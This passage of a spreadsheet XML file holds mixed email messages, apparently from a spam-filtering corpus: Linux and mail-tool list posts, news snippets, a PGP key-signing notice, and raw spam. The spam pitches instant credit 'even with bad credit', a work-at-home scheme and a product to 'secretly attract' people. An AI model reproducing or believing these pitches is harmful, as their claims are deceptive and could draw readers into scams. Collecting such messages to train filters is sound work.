 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Gary Lawrence Murphy said:
 &gt; I envy some of those posting to this list.  I've been in business for
 &gt; 24 years and I haven't yet had the luxury of writing every line of
 &gt; code for any project. We are always coerced by budgets and time to
 &gt; maximize the amount of work done elsewhere.  
 For consultancy, integration or open source work, sure, perl, python or
 java with free use of external libs makes a lot of sense IMO.
 I should note that normally when I've used C or C++ in the past, it's
 dictated by the fact that I would be working on a commercial product,
 written from the ground up, where the code you're generating is important
 IP for the company; in this case, using a third-party lib often is not an
 option, or would be a PITA licensing-wise.
 Also, cutting out third-party dependencies can reduce the risk of "oops,
 there goes the company that makes that library I depend on, now to shop
 around for something vaguely similar, figure out what bugs it's got,
 rewrite my code to use the new API, and hope for the best".
 This can be a *very* big deal, for obvious reasons ;)    Open source
 knockers should note that this is not a problem when using LGPL'd libs ;)
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Advanced CSS lists
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/27.html#advanced_css_lists
 Date: 2002-09-27T23:22:56-05:00
 _Mark Newhouse_: CSS Design: Taming Lists[1]. &amp;#8220;I'll demonstrate how to 
 use CSS to bring unwieldy lists under control. It's time for you to tell lists 
 how to behave, instead of letting them run wild on your web page.&amp;#8221;
 [1] http://www.alistapart.com/stories/taminglists/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wait too long AND...             1147
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" alig=
 n=3D"center"&gt;
   &lt;tr&gt;
     &lt;td align=3D"center"&gt;
       &lt;h2&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;a href=3D"=
 http://203.197.254.12/sharworld/enterL.htm"&gt;&lt;font size=3D"4"&gt;Secretly 
         Attract Women or Men&lt;br&gt;
         Add Some Spice To Your Life&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/h2&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align=3D"center"&gt;&lt;a href=3D"http://203.197.254.12/sharworld/enterL=
 htm"&gt;&lt;img src=3D"http://203.197.254.12/sharworld/images/woman.jpeg" width=
 =3D"173.25" height=3D"202.5"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align=3D"center"&gt;
       &lt;h2&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;a href=3D"=
 http://203.197.254.12/sharworld/enterL.htm"&gt;&lt;font size=3D"4"&gt;SecretlyAttra=
 ct 
         Women or Men&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/h2&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#000000" back=3D"#ffffff" style=3D"BACK=
 GROUND-COLOR:" #ffffff=3D"#ffffff" size=3D"2" ptsize=3D"8" family=3D"SANSS=
 ERIF" face=3D"arial" lang=3D"0"&gt;&lt;a href=3D"mailto:bambi19@uol.com.ar?subje=
 ct=3Ddeletenow"&gt;&lt;font size=3D"3"&gt;Delete&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font color=3D#00=
 0000 back=3D#ffffff style=3DBACKGROUND-COLOR: #ffffff size=3D1 ptsize=3D8 =
 family=3DSANSSERIF face=3Darial lang=3D0&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 85% APPROVAL RATE pcptu
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;$10,000 INSTANT CREDIT&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY link="#DF0000"  vlink="#DF0000"  alink="#DF0000"&gt;
 &lt;TABLE WIDTH=450 ALIGN=CENTER BGCOLOR="#DF0000"&gt;&lt;TR&gt;&lt;TD&gt;
 &lt;B&gt;&lt;FONT FACE="BASKERVILLE" SIZE=5 &gt;
 &lt;P ALIGN="CENTER"&gt;PRIORITY MESSAGE&lt;/TR&gt;&lt;/TD&gt;&lt;/TABLE&gt;
 &lt;table width=450 align=center cellpadding=10&gt;&lt;tr&gt;&lt;td&gt;
 &lt;b&gt;&lt;font face="baskerville" size=3 color="#DF0000"&gt;&lt;P&gt;
 RECEIVE 2 FREE AIRLINE TICKETS AND&lt;BR&gt;
 THE CREDIT YOU DESERVE!&lt;/P&gt;&lt;/FONT&gt;
 &lt;B&gt;&lt;FONT FACE="ARIAL" SIZE=2 COLOR="#000000"&gt;&lt;P&gt;
 GET AN UNSECURED&lt;br&gt;
 VISA - MASTERCARD&lt;p&gt;
 YES! Even with bad credit - no credit.&lt;p&gt;
 WE CAN SHOW YOU HOW TO GET&lt;p&gt;
 Instant Online Credit Approval&lt;br&gt;
 With credit limits up to $10,000 &lt;br&gt;
 Interest Rates as Low as 0%&lt;p&gt; 
 Do you have good credit?&lt;P&gt;
 You can transfer your high interest credit cards to a low 0% &lt;P&gt;
 Dear Future Card Holder&lt;/p&gt;&lt;/font&gt;
 &lt;b&gt;&lt;font face="baskerville" size=3&gt;&lt;p&gt;
 &lt;a href="http://163.125.6.192/credit"&gt;CLICK HERE&lt;/A&gt;
 AND VISIT OUR SITE!&lt;BR&gt;
 Start enjoying the Credit You Deserve&lt;/p&gt;
 &lt;/tr&gt;&lt;/td&gt;&lt;/table&gt;
 &lt;font face="arial" size=5 COLOR="#FFFFFF"&gt;&lt;p&gt;..&lt;/P&gt;&lt;/FONT&gt;
 &lt;form action="http://163.125.6.192/cgi-bin/yform.cgi" method=post&gt;
 &lt;input type=hidden name=mail_recipient value=flyfree20002@yahoo.com&gt;
 &lt;input type=text name=remove size=15&gt;&lt;input type=submit value="Remove Me"&gt;
 &lt;/form&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The case for spam
</t>
  </si>
  <si>
    <t xml:space="preserve">SpamAssassin is hurting democracy!
 Owen
 ---------------------------------------------------------------------------------------------------------------------
 http://www.bayarea.com/mld/mercurynews/news/opinion/3900215.htm
 Internet can level the political playing field
 By Mike McCurry and Larry Purpuro
 NOT many months from now, people across the country will experience one 
 of the great recurring features of American democracy. At shopping 
 malls, on factory floors, at church socials and even on our front 
 stoops, we will be approached by individuals who want to represent us in 
 public office. While chances are high that we won't know them 
 personally, they will walk up to us, offer a handshake and a flier and 
 ask for our votes.
 Just as technology is affecting every other area of communication, it 
 has begun to affect the way political candidates communicate with voters.
 In this year's GOP gubernatorial primary, California Secretary of State 
 Bill Jones, who faced better-funded candidates, acquired the e-mail 
 addresses of more than a million potential California voters and sent 
 each an unsolicited e-mail asking for support.
 That day, he might have chosen any of the more traditional -- and more 
 expensive -- methods of contacting voters, such as direct mail, radio 
 spots or TV ads. But he spent only about 2 cents per message, instead of 
 35 cents or more per message for direct mail or in another medium.
 Had Jones chosen direct mail, radio or TV, that communication would have 
 been equally ``unsolicited,'' as defined in the e-mail world. Few voters 
 would have ``opted in'' to receive campaign information from Jones 
 through any of those channels.
 The response to Jones' e-mail effort, however, was swift and intense. He 
 was lambasted by anti-spam advocates, and media coverage was almost 
 entirely negative. To be fair, some of Jones' tactics could have been 
 refined. He used a less-than-perfect list and no standard-practice 
 ``paid for'' disclaimer in the message.
 His detractors, however, attacked him not for his tactical miscues but 
 because the e-mail was sent unsolicited. In fact, Jones' online campaign 
 may have been his most visible asset. In an era of cynicism toward money 
 in politics -- money typically spent on other unsolicited communication 
 mediums -- Jones tried to level the playing field.
 No one likes commercial spam. It is irrelevant and untargeted and can be 
 highly intrusive and even offensive. But as a sophisticated society, 
 it's time to differentiate commercial spam from very different 
 unsolicited e-mail sent by political candidates to voters.
 The debate is particularly relevant in light of legislation in Congress 
 that would constitute the first federal law to directly address spam. We 
 believe e-mail is no more intrusive than direct mail, telemarketing or 
 TV advertising when it comes to politicians seeking to reach voters. A 
 simple link in good e-mail campaigns allows recipients to opt out of 
 future mailings. Direct mail takes at least a phone call or stamp to be 
 taken off a list, and viewers must repeatedly endure TV ads.
 When a candidate lacks a large campaign war chest, he or she can use the 
 Internet to provide constituents with information to better prepare them 
 to perform their civic duty of casting educated votes. With more than 60 
 percent of all potential voters in this country possessing e-mail 
 accounts, it makes sense that political candidates use this medium.
 Candidates might avoid some of the tactical problems encountered by the 
 Jones campaign if they use the technologies available today that better 
 ensure quality of e-mail lists and target content to specific recipient 
 groups.
 But the broader point remains. When a political candidate sends a voter 
 an e-mail, that recipient can choose to delete the message without 
 opening it, unsubscribe from the list, read it or even reply and engage 
 the sender. That choice should belong to the voter -- not to anti-spam 
 advocates whose efforts are better focused on commercial e-mail. 
 Political candidates should be free to communicate with voters as best 
 they can, and let voters decide what to do with that information.
 --------------------------------------------------------------------------------
 Mike McCurry, former press secretary for President Clinton, is CEO of an 
 advocacy management and communications software company. Larry Purpuro, 
 the former Republican National Committee deputy chief of staff, is 
 founder and president of a political e-marketing firm. This was written 
 for the Los Angeles Times. 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Britain puts records execs in charge of copyright enforcement
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485824
 Date: Not supplied
 The British government has invited the local equivalent of the RIAA to fund an 
 "anti-piracy" post. As Charlie puts it, "Mr Fox, here's the new set of 
 hen-house keys you ordered." 
     The UK music industry is to co-fund a new post at the Department for 
     Culture, Media and Sport (DCMS) to act as a link with the government in the 
     struggle with music piracy.  
 Link[1] Discuss[2] (_via Charlie's Diary[3]_) 
 [1] http://news.bbc.co.uk/1/hi/entertainment/music/2276388.stm
 [2] http://www.quicktopic.com/boing/H/nYc4wgMrjwLbq
 [3] http://www.antipope.org/charlie/blosxom.cgi
</t>
  </si>
  <si>
    <t xml:space="preserve">Hear hear, Gary.  I'm living with a guy right now who I met at a party, 
 emailed with for 2 weeks, then powie!  We were both looking at similar 
 goals in life in general, had some attraction for each other, and decided 
 to wing it.  I can't say what's going to happen tomorrow, but right now, 
 and for the past few months, we've been happy.  Onward Ho!  (:
 Cindy
 On 18 Sep 2002, Gary Lawrence Murphy wrote:
 &gt; &gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt; writes:
 &gt; 
 &gt;     E&gt; You just can't tell important things from a picture and a few
 &gt;     E&gt; words.  It's not how we are built.  There's no geek code for
 &gt;     E&gt; the heart and soul.
 &gt; 
 &gt; Nor is there a Turing Test, even for someone with whom you've spent 11
 &gt; years, boom, bust and boom again, and 3 children (trust me) There is
 &gt; no magic litmus test other than the totally empirical: "Try it and
 &gt; see"
 &gt; 
 &gt; "String bags full of oranges
 &gt;  And matters of the heart,
 &gt;  People laugh at /anything/
 &gt;  And things just fall apart."
 &gt;  - michael leunig
 &gt; 
 &gt; The only real test, the only /sensible/ test, is to look back and
 &gt; realize your relationship has lasted 50 years and see no reason to
 &gt; believe it couldn't last another 50.  In the absense of 50 years of
 &gt; actual (ahem) hands-on experiential data, a photo and a few words are
 &gt; as good as any, provided you are prepared for the dynamics of it.
 &gt; 
 &gt; Love is a verb.  Sex is a /shared/ pursuit.  There is no
 &gt; 'relation-ship', there is only the crew.  sail away!
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bush orders Sharon to obey UN resolutions so US can gather
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390119,1717/
 Date: 2002-09-30T11:09:23+01:00
 [IMG: http://www.newsisfree.com/Images/fark/smh.com.au.gif ([smh.com.au])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Work at Home - $5000 a month
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Earn Extra Income From Home. Here is tremendous
 opportunity to earn big money. We are a multimillion
 company that is growing at a rate of 1000% per year.
 We are looking for motivated individuals who are
 looking to earn a substantial income from home.
 This is what you been waiting for a chance to be
 financially secure.  Earn Extra Income From Home. Here
 is a tremendous opportunity to earn
  No experience is required. We will provide the
 training you may need. 
 We are looking for energetic and self- motivated
 people that want to change their life. If that is you
 click the link below and complete our online
 information request form, and one of our employment
 specialist will contact you.
 http://ter.netblah.com:27000
 Got nothing to lose and a lot to gain, with a career
 that will provide you cast opportunities and
 substantial income. Please fill our online information
 request form here:
 http://ter.netblah.com:27000
 To remove from our list simply click on the link below
 now:
 http://ter.netblah.com:27000/remove.html
 9986dxkU6-303JWSp0699MAYXl24
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Equitable prepares to compensate 70,000
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418833,215/
 Date: 2002-10-01T04:33:51+01:00
 *Money:* Up to 70,000 former Equitable Life policyholders could be in line for 
 compensation as a result of mis-selling of policies.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: Content-Type: message/rfc822  supported ?
</t>
  </si>
  <si>
    <t xml:space="preserve">  For what you're trying to do, forwarding does not work.
   'bounce' works perfectly, if you can do that.
   Another option is to save spam to a folder and report 
   it all at once.
   -chad
 On 26/07/02 08:41 +0200, Jrgen Thomsen wrote:
 ) Thu, 25 Jul 2002 18:33:15 -0700 skrev du:
 ) 
 ) &gt;  Not sure what you're asking.
 )   
 ) I just want to be sure, that forwarding an email to my own spamtrap address
 ) which performs a razor-report on the entire received email is not waste of
 ) time, because the contents of the forwarded email is not recognized as equal
 ) to the email originally received. The forwarded email has a new set of
 ) headerlines, which should be discarded and instead the headerlines of the
 ) original message are in the body of this new message and should be recognized
 ) as such and treated properly.
 ) 
 ) An ordinary Forward Unquoted in Agent is subject to character set conversions
 ) and does not depict the received spam in its original form.
 ) 
 ) I hope this clarifies my concerns.
 ) 
 ) - Jrgen
 ) 
 ) 
 ) 
 ) -------------------------------------------------------
 ) This sf.net email is sponsored by:ThinkGeek
 ) Welcome to geek heaven.
 ) http://thinkgeek.com/sf
 ) _______________________________________________
 ) Razor-users mailing list
 ) Razor-users@lists.sourceforge.net
 )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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Defcon key-signing party
</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone interested in a pgp/gpg key-signing get-together @ DC,
 please email me your key info (name, key ID, type, size,
 fingerprint), and I will add you to the list.
 If you don't have a PGP key, now is a great time to make one.
 Want to find out more about PGP?
 &lt;http://www.uk.pgp.net/pgpnet/pgp-faq/&gt;
 You can get the software from:
 PGPfreeware &lt;http://www.pgpi.org/products/pgp/versions/freeware/&gt;
 GnuPG (GPG) &lt;http://www.pgpi.org/download/gnupg/&gt;
 Bring the following:
    *  Photo ID (your name must be in your key identity)
    *  A printed copy of your key ID, key type, fingerprint, and key size
 I will pass out a master list (from what people send me now). Then
 individually we will cross-validate eachothers identities and keys.
 It works like this: person A tells B the details of their key (from
 their personal copy of the key info). Person B confirms that the key
 information on the master list matches. Next person A produces photo ID
 for person B. If it proves that person A is the owner of the key, then
 person B can check off that person on their list.
 The reverse is then done for person B.
 After a while you will end up with a list full of (hopefully) checked
 names. Later on, you can retrieve a copy of the key either from a
 keyserver or directly from the owner, verify it's valid (it matches the
 checked off name on your copy of the master list), and sign it using
 your private key.
 Then you can upload your signature of the key to a key server and send a
 copy back to the key's owner to add to thier keyring.
 ID:    Mark Renouf &lt;mark@tweakt.net&gt;
 Size:  2048
 Type:  DH/DSS
 KeyID: 0xF888F464
 Fingerprint: 9CE7 98DD E14E 8B9C 7109  2798 C18D 83A9 F888 F464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</si>
  <si>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Unseen window versus Sequences Window
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-2113882517P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Hal DeVore &lt;haldevore@acm.org&gt;
 &gt; Date:  Tue, 01 Oct 2002 23:21:21 -0500
 &gt;
 &gt; One possibility that occurs to me would be a button or mouse
 &gt; click that "shrinks" the Sequences window to show only the
 &gt; sequences in the "always show" list.  And of course a way to 
 &gt; expand it back.
 That's a pretty good idea.  I'm not sure I'll get to it any time soon.  (I 
 already have a known bug reported on 9/25 that I haven't been able to get to.)
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-2113882517P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9mvubK9b4h5R0IUIRAs2xAJ9gFx9Fvnld2Kp7JaUZyusroUweFQCfWPnM
 Pp78BfHf//xicipba00ru3o=
 =tDi6
 -----END PGP SIGNATURE-----
 --==_Exmh_-2113882517P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting.  It's possible, of course, that the shitty economy 
 is hurting the spammers as much as anyone else.  But if you've 
 been aggressively reporting, then it could just be that.  Could 
 be your upstream ISP is being more aggressive too...
 C
 On Wednesday, August 21, 2002, at 05:02  PM, Karsten M. Self wrote:
 &gt; ...what these plots *don't* show is the drop from ~55 
 &gt; mails/daily to ~30
 &gt; daily that I've seen at work, since 1st week of May, when spam receipts
 &gt; peaked.  Not sure if it's aggressive reporting that's getting us off
 &gt; lists, or if other people are seeing similar.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</si>
  <si>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[ILUG] gnome2
</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,
 I installed gentoo 1.2 with gnome2 but when right click on the desktop 
 and  under disks i get not options, What file(s) do i have to edit to 
 get this option enabled.
 Any ideas ?.
 regards,
 Nils
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: So what's a species again?
</t>
  </si>
  <si>
    <t xml:space="preserve">--=====================_4805122==_.ALT
 Content-Type: text/plain; charset="us-ascii"; format=flowed
 Well, all the transhumanists should be very interested in this one:
 &lt;http://www.newscientist.com/news/news.jsp?id=ns99992677&gt;
 &gt;Cross-species testes transplant successful
 &gt;19:00 14 August 02 NewScientist.com news service
 &gt;Testis tissue from goats and pigs has been grafted onto the backs of mice 
 &gt;and shown to produce normal sperm, capable of fertilising eggs.
 &gt;It is the first time testis tissue from such distant species has produced 
 &gt;mature sperm when grafted in mice. "It might work for primates or even 
 &gt;humans," claims Ina Dobrinski of the University of Pennsylvania, one of 
 &gt;the co-authors of the study.
 &gt;If so, the technique could be used to preserve the reproductive potential 
 &gt;of male cancer patients about to undergo therapies that would destroy 
 &gt;their ability to make sperm.
 &gt;Men often freeze sperm samples before receiving chemotherapy, but young 
 &gt;boys cannot do this because they do not produce mature sperm. If it works 
 &gt;in humans, the technique would allow testis tissue grafted from boys to 
 &gt;mature and produce sperm.
 &gt;
 &gt;Infectious particles
 &gt;The mouse grafting technique also has an advantage over another option for 
 &gt;preserving fertility - testicular transplants. These involve re-implanting 
 &gt;preserved germ cells into the testes after cancer remission.
 &gt;But the grafting approach "would eliminate any possibility of passing 
 &gt;cancer cells back to the patient," says reproductive biologist Michael 
 &gt;Griswold from Washington State University.
 &gt;However, it is possible that the grafting procedure could introduce 
 &gt;mouse-derived infectious particles into human embryos, making some 
 &gt;scientists wary of the idea. "I would very much hesitate to say that it's 
 &gt;something we should be doing," says reproductive biologist Roger Gosden of 
 &gt;the East Virginia Medical School.
 &gt;
 &gt;Castrated mice
 &gt;In the study, Dobrinski and colleagues placed small pieces of testis 
 &gt;tissue from newborn goats or pigs just under the skin on the backs of 
 &gt;castrated mice. Two to four weeks later, they found that more than half of 
 &gt;the 477 grafts had survived and were producing normal-looking goat or pig 
 &gt;sperm.
 &gt;When they injected the graft-derived sperm directly into eggs they saw 
 &gt;clear signs of fertilisation, indicating that the sperm function normally. 
 &gt;The researchers also found that the procedure worked just as well with 
 &gt;testis tissue that had been refrigerated for two days or frozen for 
 &gt;several weeks.
 &gt;Gosden has tried transplanting human testes tissue into mice, but was not 
 &gt;successful. However, Dobrinski believes the technique could soon be used 
 &gt;to preserve the germ lines of endangered species, including rare animals 
 &gt;that usually die in captivity before reaching sexual maturity. "We think 
 &gt;that's a very real application," she says.
 &gt;She adds that mice with human testis tissue grafts would also be useful to 
 &gt;scientists who want to test the effects of toxic substances and new 
 &gt;contraceptives on human sperm production.
 &gt;Journal reference: Nature (vol 418, p 778)
 &gt;Robin Orwant
 --=====================_4805122==_.ALT
 Content-Type: text/html; charset="us-ascii"
 &lt;html&gt;
 Well, all the transhumanists should be very interested in this one:&lt;br&gt;
 &amp;lt;&lt;a href="http://www.newscientist.com/news/news.jsp?id=ns99992677" eudora="autourl"&gt;http://www.newscientist.com/news/news.jsp?id=ns99992677&lt;/a&gt;&amp;gt;&lt;br&gt;&lt;br&gt;
 &lt;blockquote type=cite class=cite cite&gt;Cross-species testes transplant
 successful &lt;/blockquote&gt;&lt;br&gt;
 &lt;blockquote type=cite class=cite cite&gt;19:00 14 August 02 NewScientist.com
 news service &lt;br&gt;
 Testis tissue from goats and pigs has been grafted onto the backs of mice
 and shown to produce normal sperm, capable of fertilising eggs. &lt;br&gt;
 It is the first time testis tissue from such distant species has produced
 mature sperm when grafted in mice. &amp;quot;It might work for primates or
 even humans,&amp;quot; claims Ina Dobrinski of the University of
 Pennsylvania, one of the co-authors of the study. &lt;br&gt;
 If so, the technique could be used to preserve the reproductive potential
 of male cancer patients about to undergo therapies that would destroy
 their ability to make sperm.&lt;br&gt;
 Men often freeze sperm samples before receiving chemotherapy, but young
 boys cannot do this because they do not produce mature sperm. If it works
 in humans, the technique would allow testis tissue grafted from boys to
 mature and produce sperm.&lt;br&gt;&lt;br&gt;
 Infectious particles &lt;br&gt;
 The mouse grafting technique also has an advantage over another option
 for preserving fertility - testicular transplants. These involve
 re-implanting preserved germ cells into the testes after cancer
 remission. &lt;br&gt;
 But the grafting approach &amp;quot;would eliminate any possibility of
 passing cancer cells back to the patient,&amp;quot; says reproductive
 biologist Michael Griswold from Washington State University.&lt;br&gt;
 However, it is possible that the grafting procedure could introduce
 mouse-derived infectious particles into human embryos, making some
 scientists wary of the idea. &amp;quot;I would very much hesitate to say that
 it's something we should be doing,&amp;quot; says reproductive biologist
 Roger Gosden of the East Virginia Medical School.&lt;br&gt;&lt;br&gt;
 Castrated mice &lt;br&gt;
 In the study, Dobrinski and colleagues placed small pieces of testis
 tissue from newborn goats or pigs just under the skin on the backs of
 castrated mice. Two to four weeks later, they found that more than half
 of the 477 grafts had survived and were producing normal-looking goat or
 pig sperm.&lt;br&gt;
 When they injected the graft-derived sperm directly into eggs they saw
 clear signs of fertilisation, indicating that the sperm function
 normally. The researchers also found that the procedure worked just as
 well with testis tissue that had been refrigerated for two days or frozen
 for several weeks.&lt;br&gt;
 Gosden has tried transplanting human testes tissue into mice, but was not
 successful. However, Dobrinski believes the technique could soon be used
 to preserve the germ lines of endangered species, including rare animals
 that usually die in captivity before reaching sexual maturity. &amp;quot;We
 think that's a very real application,&amp;quot; she says.&lt;br&gt;
 She adds that mice with human testis tissue grafts would also be useful
 to scientists who want to test the effects of toxic substances and new
 contraceptives on human sperm production. &lt;br&gt;
 Journal reference: &lt;i&gt;Nature&lt;/i&gt; (vol 418, p 778) &lt;br&gt;
 Robin Orwant&lt;/blockquote&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/html&gt;
 --=====================_4805122==_.ALT--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [MLB-WIRELESS] FW: Cisco Wireless LAN Solutions
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0018_01C265A6.5F5B4A30
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Cisco SystemsFYI.
  (I'm not pro or anti Cisco, and I don't sell it. Just passing along info so
 that someone might find it of use)
 Regards,
 Gaz
 Please feel free to forward this email. Please forward it in its entirety.
       Cisco Aironet 1200 Series - Absolute freedom, maximum security.
       Dear Mr. Winder
            See how you can have the highest level of security and mobility
 with our free CD-ROM on the Cisco Aironet 1200 Series of Wireless LAN (WLAN)
 solutions.
       The modular, dual-band design supports either 2.4 GHz or 5 GHz
 wireless frequencies, or both simultaneously.  It integrates easily with
 existing wired networks and is hardware and software upgradeable.  This
 preserves existing investments, so you will be able to advance into the
 future with IEEE 802.11a and 802.11g standards without having to replace
 your entire WLAN infrastructure.
       Rest assured, the Cisco Aironet 1200 Series is as secure as a wired
 network.  Corporate data is protected by the award-winning Cisco Wireless
 Security Suite.  It's scalable, centrally managed 802.1x architecture
 provides both secure authentication as well as data transmission through
 per-user, per session generation and distribution of 128-bit encryption
 keys.
       Click here for your free CD-ROM or to request a Cisco representative
 contact you.
       Cisco Aironet 1200 Series WLAN solution - Maximum security, absolute
 freedom.
       Yours Sincerely,
       Tony Wright
       Regional Manager - Marketing
             Unsubscribe
             If you do not wish to receive further emails about the Cisco
 Aironet 1200 Series, please click here to unsubscribe.
       All contents are Copyright (c) 1992--2002 Cisco Systems, Inc. All
 rights reserved.
 ------=_NextPart_000_0018_01C265A6.5F5B4A30
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- START README MESSAGE --&gt;&lt;!--
 **********************************************************************
 Copyright (c) 1992--2002 Cisco Systems, Inc.            Decemeber 2001
 **********************************************************************
           THANK  YOU  FOR  YOUR  INTEREST  IN CISCO
 **********************************************************************
   Thank you for your interest in Cisco. Unfortunately your email
 software is not able to display this message in the format that
 it was intended, and so you are seeing the HTML source code
 instead. We apologise for this inconvenience.
   If you would like to view this mail properly please open it in
 the web browser on your PC. Most email software packages
 will provide you with the ability to do this in the OPTIONS menu.
   At Cisco, we are always eager to hear your feedback. Please
 feel free to contact us by clicking REPLY to this mail.
   Best Regards,
   Cisco Systems
 --&gt;&lt;!-- END README MESSAGE --&gt;&lt;!-- START TEMPLATE HEADER =
 --&gt;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Cisco Systems&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3DISO-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;FYI.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;&amp;nbsp;(I'm not pro or anti Cisco, and I don't =
 sell it.=20
 Just passing along info so that someone might find it of=20
 use)&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;Regards,&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;Gaz&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D1&gt;&lt;FONT face=3DArial&gt;&lt;SPAN =
 class=3D179254611-26092002&gt;&lt;FONT=20
 color=3D#0000ff size=3D2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D1&gt;&lt;FONT face=3DArial&gt;&lt;SPAN=20
 class=3D179254611-26092002&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;BR&gt;&lt;BR&gt;Please feel free to =
 forward this=20
 email. Please forward it in its entirety.&lt;/FONT&gt;&lt;/FONT&gt; &lt;A =
 name=3Dtop&gt;&lt;/A&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
